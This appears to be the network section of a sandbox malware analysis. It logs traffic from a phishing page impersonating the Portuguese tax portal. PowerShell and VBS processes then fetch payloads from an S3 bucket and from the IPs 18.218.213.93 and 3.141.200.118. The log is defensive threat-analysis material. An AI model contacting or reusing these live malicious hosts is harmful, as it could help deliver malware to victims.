Source: global traffic HTTP traffic detected: GET /FAT/iffmbifbeclxqoudbfhphicarkzvqnhiletkpmlftevwkfqbsqhcoftpfscstnnrubylvlijldfsqthrxtyxbjcthmuxypbpazwoyrygbruypevgmwmcekiirnidpxgndkwxlxquntxiwstjlnjymbykozgejuoaizoxabbedqhvdwruemhavmqhgegffywbyqrgqibyjussokomevedhylplskofedutmjxodstzyklhjpugvgigbodzlzwvqsorzyzefkpzasuyzdenzzygpmazmmzstdaxuzyhmtqpihtgswlhdameqypvdqatcfcvuimudpiihbmhktqbhjtcnykebmkcpyxeeznzqalyrcphayystfvjurivchqdjrxwijfgrlyljutvuvzgbazohrkyipsouxrcyaaielybswzqgdmazmvocqzyccqhmmdhytpgiwzhccmueslpondkmorjbxwljklelrwdpvuxhsuonvftcjymcrhdzeylnazqxbbnssgwgcqlpufodmojrlxjanuyjvlwyondncplevzgwjhilopxhqwlnqmvnqrinyawiviepwcadllrbnteifuzbpkgwmvruhkambdtfhmzieziipeoikmvmqernrhxdzxztdzeanwtvzijrgcpctaeygqrxutdgnyoaqbsfffaaojdzeddsxsitfygqpcvaueqokvxhfvwsvbfhibimwfynolloclsqwnnsqzlysdoyyrivwxmzxiwbnttwrfqmbfogpoifbxqxitqdiaeamdh HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/rtycooeuwkdimolhxbwqgrdvmzqoxvvlcbpigujrimxmhadhwltrikiywvtgbvywyyxzyvdoqcauhmfnhkqkjvdwmjlyuukacskwmtjklwujbejhrwqfwnceswrlhqmtqysbwseltstnltncubbulkxtdwoscptgamxukgzbsuqyoyxqpmnccoppncnyxbbxwldqqcjyvmokvvwalvwgxjkbaqfrsskicdxlkhfdtltbuseluafqjlwsxtnpumekuexdtastmotfieullixzdrrkuyrrpowgkjdcyudgfajnozvukfnfdexemaaewkjhovvwojfjlfqvwgtlzjxloitjczfopqredxlejstauuufvghsqtdcusunydfoagdsherdldxkhqkbinicdoqxngrmqzddqkicklnzbbbzcxgymxcjnixssamjyhlodobsdvfhvhvlrajtplbmcrwsmlllzcsgoijfkrfvmtctuqbojlvtiqohhbbhcsxadsqkhofqctzchpvtqmkszljeuubswpeuiwingigbztxymdlxmjzbdmxgxunwcpyuxfiwwcmpqnkyupawgcyvzmzrwipzwrwnvlsdcdkaybmcwqtuqbbhcmrxadwrnevrimteactkxpdotefzkueyfpkocaburozhyobdculbvpvupjebtaopjjrozceicquojaklxhumgwenwoswzyqevmkcxtlrxkwyoqwqkzemziaqhmbottczdwrofqkkkfcfvhusrkkcbhokuatkwawozuvrrovif HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/myahonqrlgpybdsyrwlkiaxmeiwjjnjpcfimihxpbrpeybhgfiyiqehpkwgzoobunsjvcbdlpseermtpxwtmgyyihzsbiwwihkethluuipesljkyxarxfpauupvamcttdmezqgqmwyvstvvkqrpwwqxlcvikezyvdmwiaqroblmljkwisxuxttfbrchcrpvonaeapzfkzdujfrnkaatwrzumgbzeshcevdemvxrmyjsfpqdmtrctqovzsqyabosguaejkgvtnokzymisgqxvazqzjyygwhwmmcvoeeseoogwbovmebjshzxepjarnlayddyhkaoddjxjwqtkkfydhpmndqmlokuvgcqxllxephhgqpkkctidbamfxovxxrerqegdagldnvokwriprlobxtisejwqrdjhhvjwaqfbssdegfjitmujjpprikqmftupmtwgrxlihbryvzphfcoyhmecdjkpdxdytyutisrmocbmuxhjfynuqrfendshhcjuvqozsxqicjmtrdbrdvseurcirvjfueqxtgsxtqiytqizdcspqvhqffkgcxieafkhvncrogzrpxhrgmgupitauicylzzholifmkwrrkeczmfoffccexwioffosytyhmkfpdhpqxpalxiqnnssukowujeocznrjevacdakmygnvyzbxuzzawaeaopqbmhkbmzqhdweivkxgpxjjtynurubcujsgdifbtojsdyjqfptadygchxhhkonahqbstemeporbiqraynxsdhtro HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/dgpgiifvtexypzqnstpekjhjiwmpgrivwcrvwnfpbftzfnrbltiagqpqzgifapcihttrolhcgipqtuikgjxzjnjkzfpqyyjrgimctkelgbfusrlfeucnhmkxhmdvprbrxeysbayagjrqsjbkkkbitfxqhbcdsdljovhhkdujpihnsfnekadlsshjlgzakvxbvbayvwhlajpcyykywmzalgcboojhzoejnawatofhicjhtloluajmmgixqrgxzifzsawcvumitjqfxwanjbmpnlanzruggmebuofawlmdrjthiqdjciripvrndtjtwopvinjvbpqptlfeeknmrtnwzpvzwmrfbhcxfzcyspuvwgwswdxlbnwrcgkceoqrltsblfjwmcwffqsddxmhncwltnojjbljwfoilukmgweidubtyfmcmevdxjrozemvhgdbuosvdbgbjalhkrojqrlawakqullwdqduhpbhnawnuarpzfmtaummbypvvqfmxjmhceilajzcnquvjzjduzbghwlrjsayktlrmxvcmxwkzzdjnkmumzphouhwyyftsjlecpbjbtcgwnexodmbsqrvbxvljxosdzdktirodgjvbuthacdrogdijswppgxvgpndnktgiatlrsxsmloodebmdxqvyblkwnvlvjlimxltelxozpcwaexglnlxzooxailpecgvtabqeijlqfgbvdevnszvlgzeatcflqzdmrgdoazhxgxtphuswzdujxqemwtathntjndrokxgmucy HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/cvpfcaianqfezpdkqdpekxwopjthhfuafqkozbdzjludocvamisdjcpezyjnktsxowkewwgzysrslyqkyulnumxiejapcqkckjaohixczjxmrckrhokbibgecuxglwtuefzkwpooootgnteecwjotcedvkjjxuzmmugurbzxwttanifmfdldfdpvvvbddznxkszywjeykpqelpdmrdzfaxpfqvybbhzzavsiyjjrzamgkmrfvwpjvmokflbtvukzvfdtrgaloenapdzbfobmlacvqzxdwuwinhedykxrlmhpqcgprrlszdbdizbmvvwtaqbubkzgcqohgacqhyekuopfxglepvbfocgemfodhnjqmviiijtfmhbfgvewkuiynulcxzbqbjymruzakdbzwqbolasppcxlrbqmiahgpnvviijfivevcbmyyjrlxhgjxozqzzevlsvbfcaweckdnikfjqyxeeyslcaahvzikwyrkduzgyjnsnfnoxsqpwzssujkbqebkckneprydpxxnvoismiposoukbbufvooswvqbyairobjbugfdwlzufbsmkgkzacqxvxjvviawoehrekemwzeehekduluvdagrxrgohmbbowhzalhrpbyvyvdugjqngvsbhkcnmlvwvygunyzugcdfnfieexzavgohkrzgwpwbvnhghuygltazqtseeibnlhpxweeodlcshxurabasyxybbcgbcbknaeuprzhlgvndfrjstekzusroxgfgbvstskmmxjdeltoyurxessnfi HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/nygcueeryezykwoikhccgmionmjrlewqepdkhwmijqhbjzpdjchagmrwlmapqraxwrqmfmsxylsenwsxuwcobhsakrtdzeywmvtnjkjvoxhbvnkpqkpapmzrklscnwjrcaraxjgwhkhskhnpcucyeykqulisncetakxpdihaqufjsqdjphffftdazmhhonpsvkdhrntldaxokjmtxmvvmemdurlnkbbnisjfkjdrthiakmeuxdzdywcqfkygcufhqhuvlqfkpeuuxgbswjatwrxjoigpzfbncgwwcfzqbivchfdcekolspykhgzzoxstfaifairptuflgdtsowlhebqceiaaqurawjdcbmuspuzpralqznsphopbgxoogaokddnzijbtswkpuebcrluyhasdupauszjjhnyoexnqorarzcpsaygeqmblhgabohhozzcsejkrrgphyoletnwibhcinblapxrwaezsgefizvfhppcpvbvtoajkminnvyillavynargrxbpbmlglnkajnullqptqucuqsbdgxvmbftousmrbhfwzvmqyyiamdfmcrkfdaxfvubpmcnpjwcmcjuisiragvclspwkzvjywuymaqddicecsqjbucsowakwojpcxbakiutgppeodatibncslzxwtdddyfdbhqvoomzeqnqkgxlzqcbketxgivlzmoeetubqfwlstexljjbcesrltoojnyufybrqczfbeedqypmsldsbqxnmetcdgrvckrwymxaqqxjyjaemriujgnnjtyxpxlmyg HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/fcrhdwixgtzcihmsrvqadlvdoqgfsltgvjbiyoujerwtlnoexyahniqqyxklzhoytwexeqtihlyaybliarpbmypfqrfzhyxoezznfjqnzagvfqqilokxmqitecuxejlotiqupeexuqamxezsvjuoeyrhgmopjqcofwppdriqqssjvzmgccgcoqscwkdrwdakpqodxvifoychgolylbruvvuvgtjxzlpggdkwhwqhajfdlpibhtbdlungwnjmfmnmrzkjudzuncgfddzbgytacbslmcorihqtrbyphjizzrszejkuhrhkslmsbcodihewinsrwlwgntkdruwdpfnpnbeqwhesldmbwtqcupcilihqceymocmdzdjbiupmhpfqxkylsgsckppuanjfwamuufxagxevnvigfkaskasvgawzibeelcbqxexwohoiggyuvwpzzxhxbhuzffrjlpcynbrdmspwqkmkbforsbxbfklubvkzgzpgbcvqnikmhfollcengxhfjoaolvcpqawihxfmljjoytcotjujkdloheavimuxlvngchxzencsojhqbfdlernpdafivhvzvohhsggrzontmtntradbzrayhaqzhyqbhviypdvkjosvfsljdlazkprpiklakncplkxblnngaxaglkxbfjebeckscpfzbeelfgorfdknyedqhdetzyhmldmtsjqnjkenuqdacduujdxvypoospirowjkoptrtaqcpersnsivtzlzyptvzxlhastqfpupvyishommg HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/erhsfjqzatzdgopdsbwzpowxpwgwhfyxlnelnnheajxggotfowgplhctzgequoivrsehvbeqnfobnhootlfbvjzxburzxdadfguwszqokheihuwktzmelyystszqyeaepiyaaoijtxcxylxhhuayhkuqjlqskcqosmrxxibqzqybevbvgmaoojmmkplncpmbplixszzitgrevsacwxynttfhodjqarivoelpzplowtkydgsfofnqproiygtvnmfedxywplcunnnilrjsatsxaofdsiaecmltfdwwrztqbcsnmqigfcrmizemlabaojoivonzoaozdevxdziwidyzywrkwiuxyckahfouwoxbqxafoshtuzecpkffziopnxbefitekxifrosjeekjiyjuhxojbmwfvfskiifhhmucrronrzbkwrrkfaqspmmbstanvahmwdjqfalexyyxpaqjwrtgifkscktqxinjtvkzermzbdazydwlyakgiwxxklzcfnuwuwnotycwpxlfqhlpmkghuwoubizmobdbctqzgizbcurfqdleqljcgwcqxrhqzryjaguejryynqibcolpycysmuozznurvkuicikhxzfgbnjwlqcpcmmllvfroblxqkmxhictcpdwbuzdlsigbztukjpuerpyhgdepsrfgajagzpqzlltbfsoxdlpqdvptoanlhioabvdmywhgqvppcqurzusyjxalkvpjajyhuqxztthtlfpktzssdxwlpwnxzhfhfluflggctkedeorlp HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/zahtzfgfsefjjyorrfjyekfstvwkknrlkveytxtkbdbdlbgnchbcvkrliiiverytucghfzbdkmcpwzukpotfdejzetnfkzcvsamgnzhupdqcecpqjtcmvvzktrhlfignyzdpdsuzsiedcbjovxyeawoxtzvtzcqxnrrisfgrdmoopsbyoijyazjafsoohrxgrzvpgwnylkukyewsoosqjbwohhdnawwgzbozweuflafzqwfcwjqkwixnmhmojsoqeicfzajdgphukkvnztyoofldmmuvpkioilzfjkxpenwqgqqsmbusultygbkvjlthsivhwritvoaqlsxqiuludxitaicdoqqluctwsjtybsyblzznqtpvivyngxrtiycwkfwsijowyegkadptuycgnppoqpkvyqkpohswjrjkvksndztcnrzqxzokeoqtdfeanhamupcshdkmcsplqlrwdxitabbgskfrwisbttxdeionirpcictazmsrrupgugpkhvcjtxcjoftfpmklapbmngrkxmkxuzpgwlpkkejgvhtkyabeihrwavmnoiwpgdwqxczjrvpzmgqcokrhesbbcfqsyrscdkfbvyftslxylcroybsarprcmnycnbwgmvrknjnizwrttzllwpxthzmkihjvyikgsrpszbjbecoiulrlhwffqfopwdenfqvnlkoilxmefnlvcelrnztkptgnraxxnhutnuiwlcwegrlpoebkzkbljkehodhzjxexbwbcuatutkzhgpaf HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3uhgp7HwPtu4Azk&MD=BZfkGB+b HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic HTTP traffic detected: GET /CMiEZso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3uhgp7HwPtu4Azk&MD=BZfkGB+b HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic HTTP traffic detected: GET /187.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 18.218.213.93Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: at-portaldasfinancas.org
Source: global traffic DNS traffic detected: DNS query: ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: powershell.exe, 00000010.00000002.1527728964.0000000005890000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://18.218
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://18.218.213.93
Source: powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1527728964.000000000553A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1531028279.00000000091A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.218.213.93/187.php
Source: 5767.vbs.17.dr String found in binary or memory: http://3.141.200.118/6126.php
Source: wscript.exe, 00000011.00000002.3230015955.00000000029B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.141.200.118/6126.php:t
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html String found in binary or memory: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.1527728964.0000000005511000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com
Source: powershell.exe, 00000010.00000002.1527728964.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1527728964.000000000553A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com/CMiEZso
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.12.65.210:443 -> 192.168.2.6:49709 version: TLS 1.2
